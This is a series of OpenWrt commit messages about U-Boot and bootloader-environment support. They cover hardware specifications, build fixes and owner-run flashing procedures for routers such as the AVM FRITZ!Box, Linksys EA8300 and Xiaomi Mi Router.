regulator-fixed introduced by commit 0f6b944c92. This reduces the
compressed kernel size by ~14 kB, with no apparent loss of
functionality. No other ath79-nand boards are using regulator-fixed
at this time.
Note: mtd_get_mac_binary art 0x5006 does not return the proper MAC
and the GL.iNet source indicates that only the 0x0 offset is valid
The ar71xx targets are unmodified.
Cc: Alexander Wördekemper <>
Signed-off-by: Jeff Kletsky <>
The GL.iNet GL-AR300M series of devices includes variants without NAND
and only the 16 MB NOR flash. These include the GL-AR300M16 and the
GL-AR300M-Lite (already with its own board name).
This board-name addition provides disambiguation from the NAND-bearing
GL-AR300M devices, both for OpenWrt code and for end users.
Kernel and firmware support for NAND and UBI will add ~320 kB to the
overall firmware size at this time. This NOR-only option continues to
provide more compact firmware for both the GL-AR300M16 as well as
those who wish to use it as an alternate or primary, NOR-resident
firmware on the GL-AR300M.
The ar71xx targets are unmodified.
Install through OEM U-Boot (HTTP-based) or `sysupgrade --force` when
booted from NOR and running OEM or OpenWrt, NOR-based firmware.
As one of the intentions is disambiguation from NAND-bearing units,
users who have flashed this firmware onto a device with NAND would
need to use U-Boot or `sysupgrade --force` to flash firmware that
again supports NAND.
There are no additional SUPPORTED_DEVICES as it is not possible to
determine if a device does or does not have NAND based on
either the OEM's or OpenWrt's board names prior to this patch.
Signed-off-by: Jeff Kletsky <>
Forward the OpenWrt TARGET_LDFLAGS to the linker of the fw_printenv tool.
In addition also use the more standard make invocation script.
With this change the fw_printenv tool is built with PIE and Full RELRO
support when activated globally in OpenWrt.
Signed-off-by: Hauke Mehrtens <>
Also update the U-Boot BSP patch for I2SE Duckbill devices.
Run tested on I2SE Duckbill and Olimex OLinuXino Maxi boards.
Signed-off-by: Michael Heimpold <>
This patch adds ath79 support for Netgear WNR2200.
Router was previously supported by ar71xx target only (8 MiB variant).
Netgear WNR2200 has two flash versions - 8MiB sold in EU, US etc. and
16 MiB for Russia and China markets. Apart from flash size both variants
share the same hardware specification.
* Description: Netgear WNR2200
* Loader: U-boot
* SOC: Atheros AR7241 (360 MHz)
* RAM: 64 MiB
* Flash: 8 MiB or 16 MiB (SPI NOR)
- U-boot binary: 256 KiB
- U-boot environment: 64 KiB
- Firmware: 7808 KiB or 16000 KiB
- ART: 64 KiB
* Ethernet: 4 x 10/100 LAN + 1 x 10/100 WAN
* Wireless: 2.4 GHz b/g/n (Atheros AR9287)
* USB: yes, 1 x USB 2.0
* Buttons:
- Reset
- WiFi (rfkill)
* LEDs:
- Power (amber/green)
- WAN (amber/green)
- WLAN (blue)
- 4 x LAN (amber/green)
- WPS (green)
* UART: 4-pin connector JP1, 3.3V (Vcc, TX, RX, GND), 115200 8N1
* Power supply: DC 12V 1.5A
* MAC addresses: LAN on case label, WAN +1, WLAN +2
* TFTP recovery
* TFTP via U-boot prompt
* sysupgrade
* Web interface
Test build configuration
Signed-off-by: Michal Cieslakiewicz <>
SoC: Qualcomm IPQ4019
RAM: 256M DDR3
WiFi: 2T2R IPQ4019 bgn
2T2R IPQ4019 a/n/ac
ETH: Atheros AR8033 RGMII PHY
BTN: 1x Connect (WPS)
LED: Power (green/red/yellow)
1. Grab the uboot for the Device from the 'u-boot-fritz1200'
subdirectory. Place it in the same directory as the ''
script. It is located in the 'scripts/flashing' subdirectory of the
OpenWRT tree.
2. Assign yourself the IP address Connect your
Computer to one of the boxes LAN ports.
3. Connect Power to the Box. As soon as the LAN port of your computer
shows link, load the U-Boot to the box using following command.
> ./ --offset 0x85000000 uboot-fritz1200.bin
4. The U-Boot will now start. Now assign yourself the IP address Copy the OpenWRT initramfs (!) image to a TFTP
server root directory and rename it to 'FRITZ1200.bin'.
5. The Box will now boot OpenWRT from RAM. This can take up to two
6. Copy the U-Boot and the OpenWRT sysupgrade (!) image to the Box using
scp. SSH into the Box and first write the Bootloader to both previous
kernel partitions.
> mtd write /path/to/uboot-fritz1200.bin uboot0
> mtd write /path/to/uboot-fritz1200.bin uboot1
7. Remove the AVM filesystem partitions to make room for our kernel +
rootfs + overlayfs.
> ubirmvol /dev/ubi0 --name=avm_filesys_0
> ubirmvol /dev/ubi0 --name=avm_filesys_1
8. Flash OpenWRT peristently using sysupgrade.
> sysupgrade -n /path/to/openwrt-sysupgrade.bin
Signed-off-by: David Bauer <>
f92be9d add support for AVM FRITZ!Repeater 1200
d651302 enable support for Atheros AR8033 PHY
e4c857c add machtype override hack
Signed-off-by: David Bauer <>
Erasesize doesn't belong in the u-boot env config for block devices as it is
known to be 512 byte aligned.
Signed-off-by: Tim Harvey <>
572ff7f fritzcreator: actually add checksum spacer
6edce1a fritzcreator: replace obscure padding generation with something more portable
2ff189f add ASUS RT-AC58U "easy install" factory u-boot shim
b91f9c2 readd spi-nand support
486ae53 improve cmd_sysupgrade
b0933f1 replace sstrip with strip
882e48a do not include generated files into git
0c5aa5f fix bugs in ipq40xx_cdp.c
Signed-off-by: David Bauer <>
This patch adds sysupgrade, uboot-env and networking support
for Methode uDPU device.
Device features 4 partitions:
| boot | recovery | rootfs | misc |
| (ext4) | (ext4) | (fsf2) | (f2fs) |
Idea was to use f2fs only but the u-boot currently lacks support
so first 2 partition are ext4 to be u-boot readable, and this was
a reason why custom build and sysupgrade sections were required.
On the sysupgrade, boot and rootfs partitions are updated, firmare
image and user configuration is saved on the misc partition and if
the upgrade was successfull, recovery partition will be updated on
after the reboot from preinit script. If the sysupgrade fails for any
reason, device will fallback to recovery initramfs image.
Signed-off-by: Vladimir Vid <>
This changes the default PKG_BUILD_DIR to take BUILD_VARIANT into
account (if set), so that packages do not need to manually override
PKG_BUILD_DIR just to handle variants.
This also updates most base packages with variants to use the updated
default PKG_BUILD_DIR.
Signed-off-by: Jeffery To <>
- make create_pbl and byte_swap as host tools
- fix a bug that maybe use the cross compiler
to compile create_pbl and byte_swap:
# -a option appends the image for Chassis 3 devices in case of non secure boot
aarch64-openwrt-linux-musl-gcc -Wall -Werror -pedantic -std=c99 -O2
-DVERSION=v1.5(release):reboot-10604-ge9216b3336 -D_GNU_SOURCE -D_XOPEN_SOURCE=700
-c -o create_pbl.o create_pbl.c
cc1: note: someone does not honour COPTS correctly, passed 0 times
LD create_pbl
/usr/bin/ld: create_pbl.o: Relocations in generic ELF (EM: 183)
/usr/bin/ld: create_pbl.o: Relocations in generic ELF (EM: 183)
/usr/bin/ld: create_pbl.o: Relocations in generic ELF (EM: 183)
create_pbl.o: error adding symbols: File in wrong format
collect2: error: ld returned 1 exit status
Makefile:43: recipe for target create_pbl failed
make[4]: *** [create_pbl] Error 1
plat/nxp/tools/ recipe for target pbl failed
make[3]: *** [pbl] Error 2
- add tfa- prefix to all tools in order to avoid future clashes with
other toolnames
Signed-off-by: Biwen Li <>
[added missing HOST_CFLAGS, added tfa- prefix to the tools]
Signed-off-by: Petr Štetiar <>
fiptool is a host tool, used in a firmware generation pipeline, but it's
not treated as such, leading to the build breakage on the hosts which
don't have {Open,Libre}SSL dev package installed:
In file included from fiptool.h:16:0,
from fiptool.c:19:
fiptool_platform.h:18:27: fatal error: openssl/sha.h:
No such file or directory
# include <openssl/sha.h>
So this patch promotes fiptool into the host tool with proper host
include and library paths under STAGING_DIR.
Signed-off-by: Petr Štetiar <>
- SoC: AR9344
- RAM: 128MB
- Flash: 2 * 16MB (MX25L12845)
- Ethernet: 2 * FE LAN & 1 * FE WAN
- WiFi: 2.4G: AR9344 5G: QCA9882
Flash instruction:
1. Hold reset and power up the router
2. Set your IP to 192.168.1.x
3. Open and upload the generated *factory* firmware
Signed-off-by: Chuanhong Guo <>
Some devices and packages require newer version of u-boot to work
properly, update u-boot to keep up with 4.19 kernel.
Signed-off-by: Vladimir Vid <>
[re-added missing commit message]
Signed-off-by: Petr Štetiar <>
This patch is in a series to allow additional STOP indexes after umount,
so that other block devices may stop cleanly.
kdumpinit is now STOP=90
Signed-off-by: Joseph Tingiris <>
After commit e82a4d9cfb ("config: regenerate *_shipped sources") the mconf
parser became more strict as a side effect and started to spew a series of
warnings when evaluating our generated kconfig sources:
tmp/ ignoring unsupported character '@'
The root cause of these warnings is a wrong use of the @SYMBOL dependency
syntax in various Makefile. Fix the corresponding Makefiles by turning
`@SYM||@SYM2` expressions into the proper `@(SYM||SYM2)` form.
Signed-off-by: Jo-Philipp Wich <>
When targets for multiple ESPRESSObin devices were added, not all
files were updated which means any ESPRESSObin version beside generic
won't have proper networking, sysupgrade and uboot-env. This patch
fixes the issue.
* fixup network detection
* fixup uboot-env
* fixup for sysupgrade
Signed-off-by: Vladimir Vid <>
Current latest LSDK-19.03 u-boot had a bug that bootcmd
environment was always been reset when u-boot started up.
This was found on boards with spi NOR boot. Before the
proper fix-up is applied, we have to use a workaround
to hard code the bootcmd for OpenWrt booting for now.
Signed-off-by: Biwen Li <>
Signed-off-by: Yangbo Lu <>
This patch is to convert to use TF-A for firmware.
- Use un-swapped rcw since swapping will be done in TF-A.
- Use u-boot with TF-A defconfig.
- Rework memory map for TF-A introduction.
Signed-off-by: Biwen Li <>
Signed-off-by: Yangbo Lu <>
Add TF-A packages for Layerscape to implement trusted firmware.
Signed-off-by: Biwen Li <>
Signed-off-by: Yangbo Lu <>
Instead of maintaining 3 very similar subtargets merge them into one.
This does not use the Arm NEON extension any more, because the SAMA5D3
does not support NEON.
Signed-off-by: Hauke Mehrtens <>
Tested-by: Sandeep Sheriker <>
This adds the host staging directory to the include path to make it use
the zlib.h files from the staging include directory and also link
against the zlib version from the staging directory.
This fixes a compile problem when the zlib header were not installed on
the build host.
Signed-off-by: Hauke Mehrtens <>
Signed-off-by: Christian Lamparter <>
[picked from openwrt-18.06]
- Qualcomm Atheros SoC QCA9558
- 720/600/200 MHz (CPU/DDR/AHB)
- 128 MB of RAM (DDR2)
- 16 MB of FLASH (SPI NOR)
- 1x 10/100/1000 Mbps Ethernet
- 3T3R 2.4 GHz (QCA9558 WMAC)
- 3T3R 5.8 Ghz (QCA9880-BR4A, Senao PCE4553AH)
Tested and working:
- lan, wireless, leds, sysupgrade (tftp)
Flash instructions:
1.) tftp recovery
- use a 1GbE switch or direct attached 1GbE link
- setup client ip address and start tftpd
- save "openwrt-ath79-generic-engenius_ecb1750-initramfs-kernel.bin" as "ap.bin" in tfpd root directory
- plugin powercord and hold reset button 10secs.. "ap.bin" will be downloaded and executed
- afterwards login via ssh and do a sysuprade
2.) oem webinterface factory install (not tested)
Use normal webinterface upgrade page und select "openwrt-ath79-generic-engenius_ecb1750-squashfs-factory.bin".
3.) oem webinterface command injection
OEM Firmware already running OpenWrt (Attitude Adjustment 12.09).
Use OEM webinterface and command injection. See wiki for details.
Signed-off-by: sven friedmann <>
Signed-off-by: Christian Lamparter <>
[use interrupt-driven "gpio-keys" binding]
The Linksys EA8300 is based on QCA4019 and QCA9888 and provides three,
independent radios. NAND provides two, alternate kernel/firmware
images with fail-over provided by the OEM U-Boot.
"Factory" images may be installed directly through the OEM GUI.
Hardware Highlights:
* IPQ4019 at 717 MHz (4 CPUs)
* 256 MB NAND (Winbond W29N02GV, 8-bit parallel)
* 256 MB RAM
* Three, fully-functional radios; `iw phy` reports (FCC/US, -CT):
* 2.4 GHz radio at 30 dBm
* 5 GHz radio on ch. 36-64 at 23 dBm
* 5 GHz radio on ch. 100-144 at 23 dBm (DFS), 149-165 at 30 dBm
#{ managed } <= 16, #{ AP, mesh point } <= 16, #{ IBSS } <= 1
* All two-stream, MCS 0-9
* 4x GigE LAN, 1x GigE Internet Ethernet jacks with port lights
* USB3, single port on rear with LED
* WPS and reset buttons
* Four status lights on top
* Serial pads internal (unpopulated)
"Linksys Dallas WiFi AP router based on Qualcomm AP DK07.1-c1"
Implementation Notes:
The OEM flash layout is preserved at this time with 3 MB kernel and
~69 MB UBIFS for each firmware version. The sysdiag (1 MB) and
syscfg (56 MB) partitions are untouched, available as read-only.
Serial Connectivity:
Serial connectivity is *not* required to flash.
Serial may be accessed by opening the device and connecting
a 3.3-V adapter using 115200, 8n1. U-Boot access is good,
including the ability to load images over TFTP and
either run or flash them.
Looking at the top of the board, from the front of the unit,
J3 can be found on the right edge of the board, near the rear
J3 |
|-| |
|O| | (3.3V seen, open-circuit)
|O| | TXD
|O| | RXD
|O| |
|O| | GND
|-| |
* serial1 "ttyQHS0" (serial0 works as console)
* Bluetooth; Qualcomm CSR8811 (potentially conected to serial1)
Other Notes: states
FCC docs also cover the Linksys EA8250. According to the
RF Test Report BT BR+EDR, "All models are identical except
for the EA8300 supports 256QAM and the EA8250 disable 256QAM."
Signed-off-by: Jeff Kletsky <>
for better identification. Also create SUPPORTED_DEVICES string from it
which corresponds to dts compatible string.
Signed-off-by: Tomasz Maciej Nowak <>
Convert whole target to Device Tree based board detection instead of
identifying devices by dts file name. With this we can drop
translation script and rely on common method for model detection.
Signed-off-by: Tomasz Maciej Nowak <>
Add vendors in device names and also rename few device names, for easier
identyfying potential firmware to flash. The vendor and device string is
mainly derived from model/compatipble string in dts from particular
device, but since not all devices are well described, some of the renames
follow marketing names.
Signed-off-by: Tomasz Maciej Nowak <>
This version has important change for tegra boards which is reserving
32MB memory for Linux kernel instead of current 16MB.
Signed-off-by: Tomasz Maciej Nowak <>
This target only supports kernel 3.18, which is not supported in OpenWrt
any more for multiple releases. It also looks like there is no active
maintainer for this target.
Remove the code and all the packages which are only used by this target.
To add this target to OpenWrt again port it to a recent and supported
kernel version.
Signed-off-by: Hauke Mehrtens <>
This target only supports kernel 3.18, which is not supported in OpenWrt
any more for multiple releases. It also looks like there is no active
maintainer for this target.
Remove the code and all the packages which are only used by this target.
To add this target to OpenWrt again port it to a recent and supported
kernel version.
Signed-off-by: Hauke Mehrtens <>
This is sold as a dual-band 802.11ac range extender. It has a sliding
switch for Extender mode or Access Point mode, a WPS button, a recessed
Reset button, a hard-power button, and a multitude of LED's, some
multiplexed via an NXP 74AHC164D chip. The internal serial header pinout is
Vcc, Tx, Rx, GND, with GND closest to the corner of the board. You may
connect at 115200 bps, 8 data bits, no parity, 1 stop bit.
- System-On-Chip: QCA9558
- CPU/Speed: 720 MHz
- Flash-Chip: Winbond 25Q128FVSG
- Flash size: 16 MiB
- RAM: 128 MiB
- Wireless No1: QCA9558 on-chip 2.4GHz 802.11bgn, 3x3
- Wireless No2: QCA99x0 chip 5GHz 802.11an+ac, 4x4
- PHY: Atheros AR8035-A
If you can get to the stock firmware's firmware upgrade option, just feed
it the factory.img and boot as usual. As an alternative, TFTP the
factory.img to the bootloader.
Signed-off-by: Daniel Gimpelevich <>
[whitespace fix in DTS and reorder of make variables]
Signed-off-by: Petr Štetiar <>
We do not need to define an empty Build/Configure since
the default checks for existing ./configure and does nothing
in case nothing is found.
Similar for Build/Compile: we can remove the definition
when we only call the default.
Signed-off-by: Michael Heimpold <>
Add U-Boot for NVIDIA Tegra based boards, with the first being CompuLab
TrimSlice. This is part of initial support for this board.
Signed-off-by: Tomasz Maciej Nowak <>
The PKG_MIRROR_HASH was for some reason wrong.
Fixes: d75db67870 ("uboot-fritz4040: bump version to 2019-03-03")
Signed-off-by: Christian Lamparter <>
- Former "mir3g" board name becomes "xiaomi,mir3g".
- Reorder some entries to maintain alphabetical order.
- Change DTS so status LEDs (yellow/red/blue) mimic
Xiaomi stock firmware: (Section Indicator)
|Yellow: Update (LED flickering), the launch of the system (steady light);
|Blue: during normal operation (steady light);
|Red: Safe mode (display flicker), system failure (steady light);
Signed-off-by: Ozgur Can Leonard <>
[Added link to similar Router 3 model]
Signed-off-by: Christian Lamparter <>
CPU: Qualcomm IPQ4019
FLASH: 128M NAND (Macronix MX30LF1G18AC-XKI)
ETH: Qualcomm QCA8072
WiFi2: IPQ4019 2T2R 2SS b/g/n
WiFi5: IPQ4019 2T2R 2SS n/ac
WiFi5: QCA9984 4T4R 4SS n/ac
LED: - Connect green/blue/red
- Power green
BTN: WPS/Connect
UART: 115200n8 3.3V
VCC - RX - TX - GND (Square is VCC)
1. Grab the uboot for the Device from the 'u-boot-fritz3000'
subdirectory. Place it in the same directory as the ''
script. It is located in the 'scripts/flashing' subdirectory of the
OpenWRT tree.
2. Assign yourself the IP address Connect your
Computer to one of the boxes LAN ports.
3. Connect Power to the Box. As soon as the LAN port of your computer
shows link, load the U-Boot to the box using following command.
> ./ --offset 0x85000000 uboot-fritz3000.bin
4. The U-Boot will now start. Now assign yourself the IP address Copy the OpenWRT initramfs (!) image to a TFTP
server root directory and rename it to 'FRITZ3000.bin'.
5. The Box will now boot OpenWRT from RAM. This can take up to two
6. Copy the U-Boot and the OpenWRT sysupgrade (!) image to the Box using
scp. SSH into the Box and first write the Bootloader to both previous
kernel partitions.
> mtd write /path/to/uboot-fritz3000.bin uboot0
> mtd write /path/to/uboot-fritz3000.bin uboot1
7. Remove the AVM filesystem partitions to make room for our kernel +
rootfs + overlayfs.
> ubirmvol /dev/ubi0 --name=avm_filesys_0
> ubirmvol /dev/ubi0 --name=avm_filesys_1
8. Flash OpenWRT peristently using sysupgrade.
> sysupgrade -n /path/to/openwrt-sysupgrade.bin
Signed-off-by: David Bauer <>
CPU: MediaTek MT7621AT (2x880MHz)
WiFi: 2.4GHz 4x4 MT7615 b/g/n (Needs driver, See Issues!)
WiFI: 5GHz 4x4 MT7615 a/n/ac (Needs driver, See Issues!)
USB: 1x 3.0
ETH: 1x WAN 10/100/1000 3x LAN 10/100/1000
LED: Power/Status
UART: 115200 8n1
Partition layout and boot:
Stock Xiaomi firmware has the MTD split into (among others)
- kernel0 (@0x200000)
- kernel1 (@0x600000)
- rootfs0
- rootfs1
- overlay (ubi)
Xiaomi uboot expects to find kernels at 0x200000 & 0x600000
referred to as system 1 & system 2 respectively.
a kernel is considered suitable for handing control over
if its linux magic number exists & uImage CRC are correct.
If either of those conditions fail, a matching sys'n'_fail flag
is set in uboot env & a restart performed in the hope that the
alternate kernel is okay.
If neither kernel checksums ok and both are marked failed, system 2
is booted anyway.
Note uboot's tftp flash install writes the transferred
image to both kernel partitions.
Similar to the Xiaomi MIR3G, we keep stock Xiaomi firmware in
kernel0 for ease of recovery, and install OpenWRT into kernel1 and
The installation file for OpenWRT is a *squashfs-factory.bin file that
contains the kernel and a ubi partition. This is flashed as follows:
nvram set flag_try_sys1_failed=1
nvram set flag_try_sys2_failed=0
nvram commit
dd if=factory.bin bs=1M count=4 | mtd write - kernel1
dd if=factory.bin bs=1M skip=4 | mtd write - rootfs0
Reverting to stock:
The part of stock firmware we've kept in kernel0 allows us to run stock
recovery, which will re-flash stock firmware from a *.bin file on a USB.
For this we do the following:
fw_setenv flag_try_sys1_failed 0
fw_setenv flag_try_sys2_failed 1
After reboot the LED status light will blink red, at which point pressing
the 'reset' button will cause stock firmware to be installed from USB.
OpenWRT currently does not have support for the MT7615 wifi chips. There is
ongoing work to add mt7615 support to the open source mt76 driver. Until that
support is in place, there are closed-source kernel modules that can be used.
Signed-off-by: Ozgur Can Leonard <>
Signed-off-by: Christian Lamparter <>
[02_network remaps, Added link to notes]
SOC: QCA9558
RAM: 128M DDR2
Flash: 16MiB SPI-NOR
ETH: QCA8337N: 2x 10/100/1000 PoE and PoE pass-through
WiFi2: QCA9558 (bgn) 2T2R
WiFi5: 2x mPCIE with AR9582 (an) 2T2R
BTN: 1x Reset
GPIO: multiple GPIO on header, PoE passthrough enable
UART: 3.3V 115200 8N1 header on the board
WDG: ATTiny13 watchdog
JTAG: header on the board
USB: 1x connector and 1x header on the board
PoE: 10-32V input in ETH port 1, passthrough in port 2
mPCIE: 2x populated with radios (but replaceable)
OpenWrt is preinstalled from factory. To install use <your-image>-sysupgade.bin
using the web interface or with sysupgrade -n.
Flash from bootloader (in case failsafe does not work)
1. Connect the LibreRouter with a serial adapter (TTL voltage) to the UART
header in the board.
2. Connect an ETH cable and configure static ip addres
3. Turn on the device and stop the bootloader sending any key through the serial
4. Use a TFTP server to serve <your image>-sysupgrade.bin file.
5. Execute the following commands at the bootloader prompt:
ath> tftp 82000000 <your image>-sysupgrade.bin
ath> erase 0x9f050000 +$filesize
ath> cp.b 0x82000000 0x9f050000 $filesize
ath> bootm 0x9f050000
More docs
* Bootloader
* Board details (schematics, gerbers):
Signed-off-by: Santiago Piccinini <>
Use tested values on shuttle,kd20 and assumed values for
mitrastar,stg-212 and cloudengines,pogoplug*.
akitio users have yet to report back stock flash layout to support
vendor bootloader environment there as well.
Signed-off-by: Daniel Golle <>
CPU: Qualcomm IPQ4019
RAM: 256M
ETH: QCA8075
VDSL: Intel/Lantiq VRX518 PCIe attached
currently not supported
DECT: Dialog SC14448
currently not supported
WiFi2: IPQ4019 2T2R 2SS b/g/n
WiFi5: IPQ4019 2T2R 2SS n/ac
LED: - Power/DSL green
- WLAN green
- FON/DECT green
- Connect/WPS green
- Info green
- Info red
- WPS/Connect
UART: 115200n8 3.3V (located under the Dialog chip)
VCC - RX - TX - GND (Square is VCC)
1. Grab the uboot for the Device from the 'u-boot-fritz7530'
subdirectory. Place it in the same directory as the ''
script. It is located in the 'scripts/flashing' subdirectory of the
OpenWRT tree.
2. Assign yourself the IP address Connect your
Computer to one of the boxes LAN ports.
3. Connect Power to the Box. As soon as the LAN port of your computer
shows link, load the U-Boot to the box using following command.
> ./ --offset 0x85000000 uboot-fritz7530.bin
4. The U-Boot will now start. Now assign yourself the IP address Copy the OpenWRT initramfs (!) image to a TFTP
server root directory and rename it to 'FRITZ7530.bin'.
5. The Box will now boot OpenWRT from RAM. This can take up to two
6. Copy the U-Boot and the OpenWRT sysupgrade (!) image to the Box using
scp. SSH into the Box and first write the Bootloader to both previous
kernel partitions.
> mtd write /path/to/uboot-fritz7530.bin uboot0
> mtd write /path/to/uboot-fritz7530.bin uboot1
7. Remove the AVM filesystem partitions to make room for our kernel +
rootfs + overlayfs.
> ubirmvol /dev/ubi0 --name=avm_filesys_0
> ubirmvol /dev/ubi0 --name=avm_filesys_1
8. Flash OpenWRT peristently using sysupgrade.
> sysupgrade -n /path/to/openwrt-sysupgrade.bin
Signed-off-by: David Bauer <>
[removed pcie-dts range node, refreshed on top of AP120-AC/E2600AC]
Signed-off-by: Christian Lamparter <>
Adds support for the AVM FRITZ!Box 7530.
Signed-off-by: David Bauer <>
Signed-off-by: Christian Lamparter <> [PKG_RELEASE]
VBoxManage is not used and the image is created with proper permisions:
0f5d0f6 image: use internal qemu-img for vmdk and vdi images drop host
dependencies on qemu-utils and VirtualBox
Unreachable config symbols:
9e0759e x86: merge all geode based subtargets into one
No need to define those symbols since x86_64 is subtarget of x86:
196fb76 x86: make x86_64 a subtarget instead of a standalone target
Unreachable config symbols, so remove GRUB_ROOT:
371b382 x86: remove the xen_domu subtarget
Signed-off-by: Tomasz Maciej Nowak <>
This commit adds support for the Linksys EA6350v3 device in the ipq40xx
This is needed for uboot-envtools to access the environment. Without this
patch, the Linksys EA6350v3 will not be able to access the uboot
environment. As a side effect, the feature auto_recovery will make the
device unstable by switching between the latest and the current firmware.
Signed-off-by: Ryan Pannell <>
Signed-off-by: Oever González <>
CPU: FSL P1020 (2x 800MHz E500 PPC)
WiFi: 2x Atheros AR9382 2x2:2 abgn
ETH: 2x BCM54616S - 1x BCM53128 8-port switch
LED: 5x LEDs (Power, WiFi1, WiFi2, N/D, SYS)
1. Download initrams kernel image, dtb binary and sysupgrade image.
2. Place initramfs kernel into tftp root directory. Rename to
3. Place dtb binary into tftp root directory. Rename to "panda.fdt".
4. Start tftp server on
5. Power up the device with the reset button pressed. It will download
the initrams and dtb via tftp and boot into OpenWRT in RAM.
6. SSH into the device and remove the factory partitions.
> ubirmvol /dev/ubi0 --name=kernel1
> ubirmvol /dev/ubi0 --name=rootfs1
> ubirmvol /dev/ubi0 --name=devicetree1
You will have around 60 MiB of free space with that.
You can also delete "kernel2", "devicetree2", "rootfs2" and "storage"
respectively in case you do not want to go back to the vendor firmware.
7. Modify the U-Boot bootcmd to allow for booting OpenWRT
> fw_setenv bootcmd_owrt "ubi part ubi && ubi read 0x1000000 kernel
&& bootm 0x1000000"
> fw_setenv bootargs_owrt "setenv bootargs console=ttyS0,115200
> fw_setenv bootcmd "run bootargs_owrt; run bootcmd_owrt"
8. Transfer the sysupgrade image via scp into the /tmp directory.
9. Upgrade the device
> sysupgrade -n /tmp/<imagename>
Signed-off-by: David Bauer <>
On musl based distributions, u-boot 2010.03 fails to build with:
u-boot-2010.03/include/u-boot/crc.h:29:50: error: unknown type name 'uint'
uint32_t crc32 (uint32_t, const unsigned char *, uint);
The issue was fixed in the newer u-boot-2018.03 version, this commit
backports the change to the older version used by ar71xx/ath79.
Signed-off-by: Andy Walsh <>
[add commit message from PR description]
Signed-off-by: Jo-Philipp Wich <>
The Detection pin is at PF6 and not at PH13 like defined before. I
checked the schematics and now I am am not seeing this error message any
Loading Environment from FAT... Card did not respond to voltage select!
Signed-off-by: Hauke Mehrtens <>
Disable the PMIC on Olimex A13 Olinuxino, as the SPL cannot set the
core voltage correctly, which causes the board to freeze later at
kernel if CPU throttling is enabled (see below). This will almost
certainly kill the VGA output (which requires LDO3 to be set), but
this is still a better option than to disable CPU throttling for
all Cortex-A8 based devices.
[ 2.485632] cpufreq: cpufreq_online: CPU0: Running at unlisted freq: 384000 KHz
[ 2.525698] cpufreq: cpufreq_online: CPU0: Unlisted initial frequency changed to: 432000 KHz
Signed-off-by: Zoltan HERPAI <>
Instead of using a fork of the ARM trusted firmware specifically for the
Allwinner SoCs, use the official version from ARM now, this version
supports the Allwinner SoCs now and the older ATF repository is
Signed-off-by: Hauke Mehrtens <>
This updates the uboot for the sunxi target to version 2018.11
The removed patches are applied upstream and not needed any more.
Signed-off-by: Hauke Mehrtens <>
Copy U-Boot to STAGING_DIR_IMAGE (and append it to the EVA-image from
there) to fix image generation using the image-builder.
Also remove the bootloader from DEVICE_PACKAGES and instead use the
BUILD_DEVICES directive from within the U-Boot makefile.
This fixes eva-image generation using the OpenWRT image-builder.
Signed-off-by: David Bauer <>
This commit adds the nescessary settings to allow reading the uboot environment variables on the GL.iNet GL-B1300 board.
Signed-off-by: Ibrahim Tachijian <>
This device is called GL-AR300M, therefore rename the board(s)
to 'gl-ar300m-nor' and 'gl-ar300m-nand'
Signed-off-by: Paul Wassi <>
[change boardname in uboot envtools as well, don't use wildcards for
Signed-off-by: Mathias Kresin <>
The LS1021A-IoT gateway reference design based on the
QorIQ LS1021A processor is a purpose-built, small
footprint hardware platform with a wide array of
high-speed connectivity and low-speed serial interfaces
to support secure delivery of IoT services for home,
business or other commercial location.
- Combines standards-based, open source software with a
feature-rich IoT gateway design to establish a common,
open framework for secured IoT service delivery and
- Provides a wide assortment of high-speed and serial-based
connectivity in a compact, highly secure design.
- High efficiency through the use of the Arm-based QorIQ
LS1021A embedded processor.
Signed-off-by: Yangbo Lu <>
Signed-off-by: Biwen Li <>
After changing board names to DT compat string, we also need to
adjust the script which generates uboot-env configuration files.
Fixes: e880a30549 ("mxs: use generic sysinfo board detection")
Signed-off-by: Michael Heimpold <>
According to, support
for the Buffalo BHR-4GRV2 in ath79 requires repartitioning from
an initramfs image, make this easier by supporting uboot-envtools
support out of the box.
Build tested, but not runtime tested.
Signed-off-by: Stefan Lippers-Hollmann <>
Port support for the Buffalo WZR-HP-AG300H from the ar71xx target to
ath79 as well.
Build- and runtime tested on the Buffalo WZR-HP-AG300H.
Signed-off-by: Stefan Lippers-Hollmann <>
Beside one exception, no one took care of these two remaining boards
still using the legacy image build code during the last two years.
Since OpenWrt 14.07 the ALLNET ALL0239-3G image building is broken.
The Sitecom WL-341 v3 image build code looks pretty hackish and broken.
It's questionable if the legacy image works as all.
Signed-off-by: Mathias Kresin <>
This patch updates the uboot-fritz4040 package to the latest version.
The portability and private-libgcc patches, as well as the script have been added to the upstream repository.
Furthermore, the upload-to-f4040 has been updated to take the first
parameter as the file it is supposed to flash, otherwise it defaults
to the previous "uboot-fritz4040.bin". Furthermore the error messages
have been improved and ftp will now dump some "progress information"
to the user's console.
Also included is support for gcc 8+ and a fix for the obnoxous error
that currently breaks the builders:
| fritz/src/lzma2eva.c:23:30: fatal error: zlib.h: No such file or directory
Signed-off-by: Christian Lamparter <>
This patch adds support for the Netgear WNDAP620 and WNDAP660,
they are similar devices, but due to the LAN LED configuration,
the switch setup and WIFI configuration each gets a different
device target.
Hardware Highlights WNDAP620:
CPU: AMCC PowerPC APM82181 at 1000 MHz
DRAM: 128 MB, 2 x 64 MiB DDR2 Hynix H5PS5162GF
CPU: AMCC PowerPC APM82181 at 1000 MHz
FLASH: 32 MiB, NAND SLC, Hynix HY27US08561A
Ethernet: RealTek RTL8363SB 2x2-Port Switch PHY - Only 1 GBit Port (POE)
Wifi: Atheros AR9380 minipcie - Dual-Band - 3x3:3
Serial: console port with RJ45 Interface (9600-N-8-1)
LEDS: Power, LAN-Activity, dual color LAN-Linkspeed, 2.4GHz, 5GHz LEDs
Button: Soft Reset Button
Antennae: 3 internal dual-band antennae + 3 x RSMA for external antennaes
Hardware Highlights WNDAP660:
CPU: AMCC PowerPC APM82181 at 1000 MHz + 2 Heatsinks
DRAM: 256 MB, 2 x 128 MiB DDR2
FLASH: 32 MiB, NAND SLC, Hynix HY27US08561A
Ethernet: RealTek RTL8363SB 2x2-Port Switch PHY (POE)
Wifi1: Atheros AR9380 minipcie - Dual-Band - 3x3:3
Wifi2: Atheros AR9380 minipcie - Dual-Band - 3x3:3
Serial: console port with RJ45 Interface (9600-N-8-1)
LEDS: Power, LAN-Activity, 2x dual color LAN-Linkspeed, 2.4GHz, 5GHz LEDs
Button: Soft Reset Button
Antennae: 6 internal dual-band antennae + 3 x RSMA for external antennaes
Flashing requirements:
- needs a tftp server at
- special 8P8C(aka RJ45)<->D-SUB9 Console Cable
("Cisco Console Cable"). Note: Both WNDAP6x0 have
a MAX3232 transceivers, hence no need for any separate
CMOS/TTL level shifters.
External Antenna:
